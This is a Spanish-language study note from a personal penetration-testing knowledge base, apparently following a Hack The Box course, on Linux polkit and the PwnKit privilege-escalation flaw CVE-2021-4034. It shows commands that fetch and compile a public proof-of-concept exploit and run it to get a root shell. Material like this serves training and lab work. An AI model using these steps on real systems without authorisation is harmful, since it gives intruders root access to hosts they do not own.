Diego Collao (3KY)

Polkit

Diego Collao (3KY)

Home
Knowledge Base
Knowledge Base
- Index
  Index
  - About
  - Join to PWNNET
- Learning Paths (ESP)
  Learning Paths (ESP)
  - (HTB) Penetration Tester
    (HTB) Penetration Tester
    
    Reconnaissance, Enumeration and Attack Planning
    Reconnaissance, Enumeration and Attack Planning
    
    Network Enumeration with NMAP
    Network Enumeration with NMAP
    
    Introduction
    
    Host Enumeration
    Host Enumeration
    
    Host Discovery
    
    Host and Port Scanning
    
    Saving the Results
    
    Service Enumeration
    
    Nmap Scripting Engine
    
    Performance
    
    Bypass Security Measures
    Bypass Security Measures
    
    Firewall and IDS/IPS Evasion
    
    Footprinting
    Footprinting
    
    Introduction
    Introduction
    
    Enumeration Principles
    
    Enumeration Methodology
    
    Host Based Enumeration
    Host Based Enumeration
    
    FTP
    
    SMB
    
    NFS
    
    DNS
    
    SMTP
    
    IMAP - POP3
    
    SNMP
    
    MySQL
    
    MSSQL
    
    Oracle TNS
    
    IPMI
    
    Remote Management Protocols
    Remote Management Protocols
    
    Linux RMP
    
    Windows RMP
    
    Information Gathering
    Information Gathering
    
    Introduction
    Introduction
    
    Introduction
    
    WHOIS
    WHOIS
    
    WHOIS
    
    Utilising WHOIS
    
    DNS and Subdomains
    DNS and Subdomains
    
    DNS
    
    Digging DNS
    
    Subdomains
    
    Subdomain Bruteforcing
    
    DNS Zone Transfers
    
    Virtual Hosts
    
    Certificate Transparency Logs
    
    Fingerprinting
    Fingerprinting
    
    Fingerprinting
    
    Crawling
    Crawling
    
    Crawling
    
    robots.txt
    
    Well-Known URIs
    
    Creepy Crawlies
    
    Search Engine Discovery
    Search Engine Discovery
    
    Search Engine Discovery
    
    Web Archives
    Web Archives
    
    Web Archives
    
    Automating Recon
    Automating Recon
    
    Automating Recon
    
    Vulnerability Assessment
    Vulnerability Assessment
    
    Security Assessments
    Security Assessments
    
    Security Assessments
    
    Vulnerability Assessment
    
    Assessment Standards
    
    Vulnerability Scoring and Reporting
    Vulnerability Scoring and Reporting
    
    CVSS
    
    CVE
    
    Nessus
    Nessus
    
    Vulnerability Scanning Overview
    
    Getting Started with Nessus
    
    Nessus Scan
    
    Advanced Settings
    
    Working with Nessus Scan Output
    
    Scanning Issues
    
    OpenVAS
    OpenVAS
    
    Getting Started with OpenVAS
    
    OpenVAS Scan
    
    Exporting The Results
    
    Reporting
    Reporting
    
    Reporting
    
    File Transfers
    File Transfers
    
    Introduction
    Introduction
    
    File Transfers
    
    File Transfer Methods
    File Transfer Methods
    
    Windows File Transfer Methods
    
    Linux File Transfer Methods
    
    Transferring File with Code
    
    Miscellaneous File Transfer Methods
    
    Protected File Transfers
    
    Catching Files over HTTP-S
    
    Living off The Land
    
    Detect or Be Detected
    Detect or Be Detected
    
    Detection
    
    Evading Detection
    
    Shells and Payloads
    Shells and Payloads
    
    Introduction
    Introduction
    
    Shells Jack Us In, Payloads Deliver Us Shells
    
    CAT5 Securitys Engagement Preparation
    
    Shell Basics
    Shell Basics
    
    Anatomy of a Shell
    
    Bind Shells
    
    Reverse Shells
    
    Payloads
    Payloads
    
    Introduction to Payloads
    
    Automating Payloads and Delivery with Metasploit
    
    Crafting payloads with MSFvenom
    
    Windows Shells
    Windows Shells
    
    Infiltrating Windows
    
    UNIX Shells
    UNIX Shells
    
    Infiltrating Unix-Linux
    
    Spawning Interactive Shells
    
    Web Shells
    Web Shells
    
    Introduction to Web Shells
    
    Laudanum, One Webshell to Rule Them All
    
    Antak Webshell
    
    PHP Web Shells
    
    Additional Considerations
    Additional Considerations
    
    Detection and Prevention
    
    Metasploit Framework
    Metasploit Framework
    
    Introduction
    Introduction
    
    Preface
    
    Introduction to Metasploit
    
    Introduction to MSFconsole
    
    MSF Components
    MSF Components
    
    Modules
    
    Targets
    
    Payloads
    
    Encoders
    
    Databases
    
    Plugins and Mixins
    
    MSF Sessions
    MSF Sessions
    
    Sessions and Jobs
    
    Meterpreter
    
    Additional Features
    Additional Features
    
    Writing and Importing Modules
    
    Introduction to MSFVenom
    
    Firewall and IDS/IPS Evasion
    
    Exploitation and Lateral Movement
    Exploitation and Lateral Movement
    
    Password Attacks
    Password Attacks
    
    Introduction
    Introduction
    
    Theory of Protection
    
    Credential Storage
    
    John The Ripper
    
    Remote Password Attacks
    Remote Password Attacks
    
    Network Services
    
    Password Mutations
    
    Password Reuse and Default Passwords
    
    Windows Local Password Attacks
    Windows Local Password Attacks
    
    Attacking SAM
    
    Attacking LSASS
    
    Attacking AD and NTDS.dit
    
    Credential Hunting in Windows
    
    Linux Local Password Attacks
    Linux Local Password Attacks
    
    Credential Hunting in Linux
    
    Passwd, Shadow and Opasswd
    
    Windows Lateral Movement
    Windows Lateral Movement
    
    Pass the Hash (PtH)
    
    Pass the Ticket (PtT) from Windows
    
    Pass the Ticket (PtT) from Linux
    
    Cracking Files
    Cracking Files
    
    Protected Files
    
    Protected Archives
    
    Password Management
    Password Management
    
    Password Policies
    
    Password Managers
    
    Attacking Common Services
    Attacking Common Services
    
    Introduction
    Introduction
    
    Interacting with Common Services
    
    Protocol Specific Attacks
    Protocol Specific Attacks
    
    The Concept of Attacks
    
    Service Misconfigurations
    
    Finding Sensitive Information
    
    FTP
    FTP
    
    Attacking FTP
    
    Latest FTP Vulnerabilities
    
    SMB
    SMB
    
    Attacking SMB
    
    Latest SMB Vulnerabilities
    
    SQL Databases
    SQL Databases
    
    Attacking SQL Databases
    
    Latest SQL Vulnerabilities
    
    RDP
    RDP
    
    Attacking RDP
    
    Latest RDP Vulnerabilities
    
    DNS
    DNS
    
    Attacking DNS
    
    Latest DNS Vulnerabilities
    
    SMTP
    SMTP
    
    Attacking Email Services
    
    Latest Email Service Vulnerabilities
    
    Pivoting, Tunneling, and Port Forwarding
    Pivoting, Tunneling, and Port Forwarding
    
    Introduction
    Introduction
    
    Introduction to Pivoting, Tunneling and Port Forwarding
    
    The Networking Behind Pivoting
    
    Choosing The Dig Site and Starting Our Tunnels
    Choosing The Dig Site and Starting Our Tunnels
    
    Dynamic PF with SSH and SOCKS Tunneling
    
    Remote-Reverse PF with SSH
    
    Meterpreter Tunneling and PF
    
    Playing Pong with Socat
    Playing Pong with Socat
    
    Socat Redirection with a Reverse Shell
    
    Socat Redirection with a Bind Shell
    
    Pivoting Around Obstacles
    Pivoting Around Obstacles
    
    SSH for Windows plink.exe
    
    SSH Pivoting with sshuttle
    
    Web Server Pivoting with Rpivot
    
    PF with Windows Netsh
    
    Branching Out Our Tunnels
    Branching Out Our Tunnels
    
    DNS Tunneling with Dnscat2
    
    SOCKS5 Tunneling with Chisel
    
    ICMP Tunneling with SOCKS
    
    Double Pivots
    Double Pivots
    
    RDP and SOCKS Tunneling with SocksOverRDP
    
    Additional Considerations
    Additional Considerations
    
    Detection and Prevention
    
    Beyond this Module
    
    Active Directory Enumeration and Attacks
    Active Directory Enumeration and Attacks
    
    Setting The Stage
    Setting The Stage
    
    Introduction to AD Enumeration and Attacks
    
    Tools Of The Trade
    
    Scenario
    
    Initial Enumeration
    Initial Enumeration
    
    External Recon and Enumeration Principles
    
    Initial Enumeration of the Domain
    
    Sniffing out a Foothold
    Sniffing out a Foothold
    
    LLMNR NBT-NS Poisoning - from Linux
    
    LLMNR NBT-NS Poisoning - from Windows
    
    Sighting In, Hunting For A User
    Sighting In, Hunting For A User
    
    Password Spraying Overview
    
    Enumerating and Retrieving Password Policies
    
    Password Spraying - Making a Target User List
    
    Spray Responsibly
    Spray Responsibly
    
    Internal Password Spraying - from Linux
    
    Internal Password Spraying - from Windows
    
    Deeper Down the Rabbit Hole
    Deeper Down the Rabbit Hole
    
    Enumerating Security Controls
    
    Credentialed Enumeration - from Linux
    
    Credentialed Enumeration - from Windows
    
    Living Off the Land
    
    Cooking with Fire
    Cooking with Fire
    
    Kerberoasting - from Linux
    
    Kerberoasting - from Windows
    
    An ACE in the Hole
    An ACE in the Hole
    
    Access Control List (ACL) Abuse Primer
    
    ACL Enumeration
    
    ACL Abuse Tactics
    
    DCSync
    
    Stacking The Deck
    Stacking The Deck
    
    Privileged Access
    
    Kerberos Double Hop Problem
    
    Bleeding Edge Vulnerabilities
    
    Miscellaneous Misconfigurations
    
    Why So Trusting
    Why So Trusting
    
    Domain Trusts Primer
    
    Attacking Domain Trusts - Child - Parent Trusts - from Windows
    
    Attacking Domain Trusts - Child - Parent Trusts - from Linux
    
    Breaking Down Boundaries
    Breaking Down Boundaries
    
    Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
    
    Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
    
    Defensive Considerations
    Defensive Considerations
    
    Hardening Active Directory
    
    Additional AD Auditing Techniques
    
    Final Showdown
    Final Showdown
    
    Beyond this Module
    
    Web Exploitation
    Web Exploitation
    
    Using Web Proxies
    Using Web Proxies
    
    Getting Started
    Getting Started
    
    Intro to Web Proxies
    
    Setting Up
    
    Web Proxy
    Web Proxy
    
    Proxy Setup
    
    Intercepting Web Requests
    
    Intercepting Responses
    
    Automatic Modification
    
    Repeating Requests
    
    Encoding and Decoding
    
    Proxying Tools
    
    Web Fuzzer
    Web Fuzzer
    
    Burp Intruder
    
    ZAP Fuzzer
    
    Web Scanner
    Web Scanner
    
    Burp Scanner
    
    ZAP Scanner
    
    Extensions
    
    Attacking Web Applications with Ffuf
    Attacking Web Applications with Ffuf
    
    Introduction
    Introduction
    
    Introduction
    
    Web Fuzzing
    
    Basic Fuzzing
    Basic Fuzzing
    
    Directory Fuzzing
    
    Page Fuzzing
    
    Recursive Fuzzing
    
    Domain Fuzzing
    Domain Fuzzing
    
    DNS Records
    
    Sub-domain Fuzzing
    
    Vhost Fuzzing
    
    Filtering Results
    
    Parameter Fuzzing
    Parameter Fuzzing
    
    Parameter Fuzzing - GET
    
    Parameter Fuzzing - POST
    
    Value Fuzzing
    
    Login Brute Forcing
    Login Brute Forcing
    
    Introduction
    Introduction
    
    Introduction to Brute Forcing
    
    Basic HTTP Auth Brute Forcing
    Basic HTTP Auth Brute Forcing
    
    Password Attacks
    
    Default Passwords
    
    Username Brute Force
    
    Web Forms Brute Forcing
    Web Forms Brute Forcing
    
    Hydra Modules
    
    Determine Login Parameters
    
    Login Form Attacks
    
    Service Authentication Attacks
    Service Authentication Attacks
    
    Personalized Wordlists
    
    Service Authentication Brute Forcing
    
    SQLi Fundamentals
    SQLi Fundamentals
    
    Introduction
    Introduction
    
    Introduction
    
    Databases
    Databases
    
    Intro to Databases
    
    Types of Databases
    
    MySQL
    MySQL
    
    Intro to MySQL
    
    SQL Statements
    
    Query Results
    
    SQL Operators
    
    SQL Injections
    SQL Injections
    
    Intro to SQL Injections
    
    Subverting Query Logic
    
    Using Comments
    
    Union Clause
    
    Union Injection
    
    Exploitation
    Exploitation
    
    Database Enumeration
    
    Reading Files
    
    Writing Files
    
    Mitigations
    Mitigations
    
    Mitigating SQL Injection
    
    Command Injections
    Command Injections
    
    Introduction
    Introduction
    
    Intro to Command Injections
    
    Exploitation
    Exploitation
    
    Detection
    
    Injecting Commands
    
    Other Injection Operators
    
    Filter Evasion
    Filter Evasion
    
    Identifying Filters
    
    Bypassing Space Filters
    
    Bypassing Other Blacklisted Characters
    
    Bypassing Blacklisted Commands
    
    Advanced Command Obfuscation
    
    Evasion Tools
    
    Prevention
    Prevention
    
    Command Injection Prevention
    
    SQLMap Essentials
    SQLMap Essentials
    
    Getting Started
    Getting Started
    
    SQLMap Overview
    
    Getting Started with SQLMap
    
    SQLMap Output Description
    
    Building Attacks
    Building Attacks
    
    Running SQLMap on an HTTP Request
    
    Handling SQLMap Errors
    
    Attack Tuning
    
    Database Enumeration
    Database Enumeration
    
    Database Enumeration
    
    Advanced Database Enumeration
    
    Advanced SQLMap Usage
    Advanced SQLMap Usage
    
    Bypassing Web Application Protections
    
    OS Exploitation
    
    Cross-Site Scripting (XSS)
    Cross-Site Scripting (XSS)
    
    XSS Basics
    XSS Basics
    
    Intro to XSS
    
    Stored XSS
    
    Reflected XSS
    
    DOM XSS
    
    XSS Discovery
    
    XSS Attacks
    XSS Attacks
    
    Defacing
    
    Phishing
    
    Session Hijacking
    
    XSS Prevention
    XSS Prevention
    
    XSS Prevention
    
    File Inclusion
    File Inclusion
    
    Introduction
    Introduction
    
    Intro to File Inclusions
    
    File Disclosure
    File Disclosure
    
    Local File Inclusion (LFI)
    
    Basic Bypasses
    
    PHP Filters
    
    Remote Code Execution
    Remote Code Execution
    
    PHP Wrappers
    
    Remote File Inclusion (RFI)
    
    LFI and File Uploads
    
    Log Poisoning
    
    Automation and Prevention
    Automation and Prevention
    
    Automated Scanning
    
    File Inclusion Prevention
    
    File Upload Attacks
    File Upload Attacks
    
    Introduction
    Introduction
    
    Intro to File Upload Attacks
    
    Basic Exploitation
    Basic Exploitation
    
    Absent Validation
    
    Upload Exploitation
    
    Bypassing Filters
    Bypassing Filters
    
    Client-Side Validation
    
    Blacklist Filters
    
    Whitelist Filters
    
    Type Filters
    
    Other Upload Attacks
    Other Upload Attacks
    
    Limited File Uploads
    
    Other Upload Attacks
    
    Prevention
    Prevention
    
    Preventing File Upload Vulnerabilities
    
    Web Attacks
    Web Attacks
    
    Introduction
    Introduction
    
    Introduction to Web Attacks
    
    HTTP Verb Tampering
    HTTP Verb Tampering
    
    Intro to HTTP Verb Tampering
    
    Bypassing Basic Authentication
    
    Bypassing Security Filters
    
    Verb Tampering Prevention
    
    Insecure Direct Object References (IDOR)
    Insecure Direct Object References (IDOR)
    
    Intro to IDOR
    
    Identifying IDORs
    
    Mass IDOR Enumeration
    
    Bypassing Encoded References
    
    IDOR in Insecure APIs
    
    Chaining IDOR Vulnerabilities
    
    IDOR Prevention
    
    XXE Injection
    XXE Injection
    
    Intro to XXE
    
    Local File Disclosure
    
    Advanced File Disclosure
    
    Blind Data Exfiltration
    
    XXE Prevention
    
    Attacking Common Applications
    Attacking Common Applications
    
    Setting the Stage
    Setting the Stage
    
    Introduction to Attacking Common Applications
    
    Application Discovery and Enumeration
    
    Content Management Systems (CMS)
    Content Management Systems (CMS)
    
    WordPress - Discovery and Enumeration
    
    Attacking WordPress
    
    Joomla - Discovery and Enumeration
    
    Attacking Joomla
    
    Drupal - Discovery and Enumeration
    
    Attacking Drupal
    
    Servlet Containers and Software Development
    Servlet Containers and Software Development
    
    Tomcat - Discovery and Enumeration
    
    Attacking Tomcat
    
    Jenkins - Discovery and Enumeration
    
    Attacking Jenkins
    
    Infrastructure and Network Monitoring Tools
    Infrastructure and Network Monitoring Tools
    
    Splunk - Discovery and Enumeration
    
    Attacking Splunk
    
    PRTG Network Monitor
    
    Customer Service Mgmt and Configuration Management
    Customer Service Mgmt and Configuration Management
    
    osTicket
    
    Gitlab - Discovery and Enumeration
    
    Attacking GitLab
    
    Common Gateway Interfaces
    Common Gateway Interfaces
    
    Attacking Tomcat CGI
    
    Attacking CGI Applications - Shellshock
    
    Thick Client Applications
    Thick Client Applications
    
    Attacking Thick Client Applications
    
    Exploiting Web Vulnerabilities in Thick-Client Applications
    
    Miscellaneous Applications
    Miscellaneous Applications
    
    ColdFusion - Discovery and Enumeration
    
    Attacking ColdFusion
    
    IIS Tilde Enumeration
    
    Attacking LDAP
    
    Web Mass Assignment Vulnerabilities
    
    Attacking Applications Connecting to Services
    
    Other Notable Applications
    
    Closing Out
    Closing Out
    
    Application Hardening
    
    Post-Exploitation
    Post-Exploitation
    
    Linux Privilege Escalation
    Linux Privilege Escalation
    
    Introduction
    Introduction
    
    Introduction to Linux Privilege Escalation
    
    Information Gathering
    Information Gathering
    
    Environment Enumeration
    
    Linux Services and Internals Enumeration
    
    Credential Hunting
    
    Environment-based Privilege Escalation
    Environment-based Privilege Escalation
    
    Path Abuse
    
    Wildcard Abuse
    
    Escaping Restricted Shells
    
    Permissions-based Privilege Escalation
    Permissions-based Privilege Escalation
    
    Special Permissions
    
    Sudo Rights Abuse
    
    Privileged Groups
    
    Capabilities
    
    Service-based Privilege Escalation
    Service-based Privilege Escalation
    
    Vulnerable Services
    
    Cron Job Abuse
    
    LXD
    
    Docker
    
    Kubernetes
    
    Logrotate
    
    Miscellaneous Techniques
    
    Linux Internals-based Privilege Escalation
    Linux Internals-based Privilege Escalation
    
    Kernel Exploits
    
    Shared Libraries
    
    Shared Object Hijacking
    
    Python Library Hijacking
    
    Recent 0-Days
    Recent 0-Days
    
    Sudo
    
    Polkit
    
    Dirty Pipe
    
    Netfilter
    
    Hardening Considerations
    Hardening Considerations
    
    Linux Hardening
    
    Windows Privilege Escalation
    Windows Privilege Escalation
    
    Introduction
    Introduction
    
    Introduction to Windows Privilege Escalation
    
    Useful Tools
    
    Getting the Lay of the Land
    Getting the Lay of the Land
    
    Situational Awareness
    
    Initial Enumeration
    
    Communication with Processes
    
    Windows Users Privileges
    Windows Users Privileges
    
    Windows Privileges Overview
    
    SeImpersonate and SeAssignPrimaryToken
    
    SeDebugPrivilege
    
    SeTakeOwnershipPrivilege
    
    Windows Group Privileges
    Windows Group Privileges
    
    Windows Built-in Groups
    
    Event Log Readers
    
    DnsAdmins
    
    Hyper-V Administrators
    
    Print Operators
    
    Server Operators
    
    Attacking the OS
    Attacking the OS
    
    User Account Control
    
    Weak Permissions
    
    Kernel Exploits
    
    Vulnerable Services
    
    DLL Injection
    
    Credential Theft
    Credential Theft
    
    Credential Hunting
    
    Other Files
    
    Further Credential Theft
    
    Restricted Environments
    Restricted Environments
    
    Citrix Breakout
    
    Additional Techniques
    Additional Techniques
    
    Interacting with Users
    
    Pillaging
    
    Miscellaneous Techniques
    
    Dealing with End of Life Systems
    Dealing with End of Life Systems
    
    Legacy Operating Systems
    
    Windows Server
    
    Windows Desktop Versions
    
    Closing Thoughts
    Closing Thoughts
    
    Windows Hardening
    
    Reporting and Capstone
    Reporting and Capstone
    
    Documentation and Reporting
    Documentation and Reporting
    
    Introduction
    Introduction
    
    Introduction to Documentation and Reporting
    
    Preparation
    Preparation
    
    Notetaking and Organization
    
    Types of Reports
    
    Components of a Report
    
    Reporting
    Reporting
    
    How to Write Up a Finding
    
    Reporting Tips and Tricks
    
    Next Steps
    Next Steps
    
    Beyond this Module
    
    Attacking Enterprise Networks
    Attacking Enterprise Networks
    
    Pre-Engagement
    Pre-Engagement
    
    Intro to Attacking Enterprise Networks
    
    Scenario and Kickoff
    
    External Testing
    External Testing
    
    External Information Gathering
    
    Service Enumeration and Exploitation
    
    Web Enumeration and Exploitation
    
    Initial Access
    
    Internal Testing
    Internal Testing
    
    Post-Exploitation Persistence
    
    Internal Information Gathering
    
    Exploitation and Privilege Escalation
    
    Lateral Movement and Privilege Escalation
    Lateral Movement and Privilege Escalation
    
    Lateral Movement
    
    Active Directory Compromise
    
    Post-Exploitation
    
    Wrapping Up
    Wrapping Up
    
    Engagement Closeout
    
    Beyond this Module
  - (HTB) Other Modules
    (HTB) Other Modules
    
    Introduction to Active Directory
    Introduction to Active Directory
    
    Active Directory Overview
    Active Directory Overview
    
    Why Active Directory?
    
    Active Directory Research Over the Years
    
    Active Directory Fundamentals
    Active Directory Fundamentals
    
    Active Directory Structure
    
    Active Directory Terminology
    
    Active Directory Objects
    
    Active Directory Functionality
    
    Active Directory Protocols
    Active Directory Protocols
    
    Kerberos, DNS, LDAP, MSRPC
    
    NTLM Authentication
    
    All About Users
    All About Users
    
    User and Machine Accounts
    
    Active Directory Groups
    
    Active Directory Rights and Privileges
    
    Digging in Deeper
    Digging in Deeper
    
    Security in Active Directory
    
    Examining Group Policy
    
    Getting Our Hands Dirty
    Getting Our Hands Dirty
    
    AD Administration: Guided Lab Part I
    
    AD Administration: Guided Lab Part II
    
    Module Summary
    Module Summary
    
    Wrapping It Up
  - Core Impact
    Core Impact
    
    Getting Started with Core Impact
    Getting Started with Core Impact
    
    User Interface
    
    Cleanup
    
    Reporting
    
    Using Modules
    
    Workspace Management
    
    Teaming
    
    Generating Agents
    
    Command and Control Options
    
    Using Search
    
    Agent Persistence
    
    Creating Macros
    
    Core Impact Training in 20 Minutes
    Core Impact Training in 20 Minutes
    
    Discovery Methods and RPTs
    
    Attacking Web Applications
    
    Pivoting
    
    Setting Up Listeners
    
    Password Spraying
    
    Man-in-the-Middle Attacks
    
    Post-Exploitation Techniques
    
    Pen Test Reporting
    
    Core Impact Advanced Techniques
    Core Impact Advanced Techniques
    
    MITRE ATT&CK
    
    Password Attacks
    
    Windows Secret Dump
    
    .NET Assembly Execution
    
    Restful API Utilization
    
    Active Directory Attacks
    
    Golden Ticket
    
    Agent Process Injection
    
    Session Passing From Core Impact to Cobalt
    
    Local Information Gathering, Ids and Privilege Escalation in Core Impact
    
    Using Core Impact with PowerShell Empire
    
    Conducting Phishing Attacks in Core Impact
    Conducting Phishing Attacks in Core Impact
    
    LinkedIn Phishing Campaign
    
    Phishing Attacks Using SMTP
  - Core Impact Cloud
    Core Impact Cloud
    
    Introduction
    
    Network IG RPT, Network AP RPT, Remote Exploits & Privilege Escalation
    
    Pivoting, Identity Verifiers & Network SQL Agent
    
    Active Directory Attacks
    
    Client Side Attack Vector - How to Conduct a Successful Phishing Attack
    
    Web Applications - How to Conduct a Successful Web Application Test
  - Core Impact 101
    Core Impact 101
    
    Getting Started
    Getting Started
    
    Index
    
    Penetration Testing
    
    Core Impact
    
    LAB Environment Setup
    LAB Environment Setup
    
    Introduction
    
    Virtualbox setup
    
    Core Impact Virtual Machine setup
    
    Vulnerable Virtual Machines
    
    The Basics
    The Basics
    
    Starting Core Impact
    
    Quick Tour
    
    Network Information Gathering
    
    Exploitation and Post-Exploitation
    
    Maintaining Access and Escalating Privileges
    
    Cleanup post-penetration test
    
    Reporting
    
    Active Directory
    Active Directory
    
    Introduction to Active Directory
    
    Active Directory Domain Reconnaissance
    
    Active Directory Attack Paths Discovery
    
    Kerberoast
    
    AS-REP Roast
    
    DCSync
    
    Golden Ticket
    
    Silver Ticket
    
    Lateral Movement
    
    Man-In-The-Middle-Attacks: NTLMrelayx
    
    Social Engineering & Client-Side Attacks
    Social Engineering & Client-Side Attacks
    
    Information Gathering
    
    Phishing Campaign Deployment
    
    Role Playing - You are the target now
    
    Reporting
    
    Web Applications Testing
    Web Applications Testing
    
    Introduction
    
    Information Gathering
    
    Attack and Penetration
    
    Post-Exploitation
    
    Reporting
    
    Next Steps
    Next Steps
    
    Further Resources
    
    Before you go...
Shop
HTB
Github
Linkedin

Polkit

PolicyKit (polkit) es un servicio de autorización en sistemas operativos basados en Linux que permite que el software de usuario y los componentes del sistema se comuniquen entre sí si el software de usuario está autorizado para hacerlo. Para verificar si el software de usuario está autorizado para esta instrucción, se consulta a polkit. Es posible establecer cómo se otorgan los permisos de manera predeterminada para cada usuario y aplicación. Por ejemplo, para cada usuario, se puede establecer si la operación debe ser generalmente permitida o prohibida, o si se requiere autorización como administrador o como un usuario separado con una validez limitada a una sola vez, proceso, sesión o ilimitada. Para usuarios y grupos individuales, las autorizaciones se pueden asignar de manera individual.

Polkit trabaja con dos grupos de archivos:

actions/policies (/usr/share/polkit-1/actions)
rules (/usr/share/polkit-1/rules.d)

Polkit también tiene local authority rules (reglas de autoridad local) que pueden ser usadas para establecer o eliminar permisos adicionales para usuarios y grupos. Las reglas personalizadas pueden colocarse en el directorio /etc/polkit-1/localauthority/50-local.d con la extensión de archivo .pkla.

PolKit también viene con tres programas adicionales:

pkexec - ejecuta un programa con los derechos de otro usuario o con derechos de root
pkaction - puede ser usado para mostrar acciones
pkcheck - puede ser usado para verificar si un proceso está autorizado para una acción específica

La herramienta más interesante para nosotros, en este caso, es pkexec porque realiza la misma tarea que sudo y puede ejecutar un programa con los derechos de otro usuario o root.

cry0l1t3@nix02:~$ # pkexec -u <user> <command>
cry0l1t3@nix02:~$ pkexec -u root id

uid=0(root) gid=0(root) groups=0(root)

En la herramienta pkexec, se encontró la vulnerabilidad de corrupción de memoria con el identificador CVE-2021-4034, también conocida como Pwnkit, que también conduce a la escalación de privilegios. Esta vulnerabilidad estuvo oculta durante más de diez años, y nadie puede decir con precisión cuándo fue descubierta y explotada. Finalmente, en noviembre de 2021, esta vulnerabilidad fue publicada y corregida dos meses después.

Para explotar esta vulnerabilidad, necesitamos descargar un PoC y compilarlo en el sistema objetivo o en una copia que hayamos hecho.

cry0l1t3@nix02:~$ git clone https://github.com/arthepsy/CVE-2021-4034.git
cry0l1t3@nix02:~$ cd CVE-2021-4034
cry0l1t3@nix02:~$ gcc cve-2021-4034-poc.c -o poc

Una vez que hemos compilado el código, podemos ejecutarlo sin más preámbulos. Después de la ejecución, cambiamos de la shell estándar (sh) a Bash (bash) y verificamos los IDs del usuario.

cry0l1t3@nix02:~$ ./poc

# id

uid=0(root) gid=0(root) groups=0(root)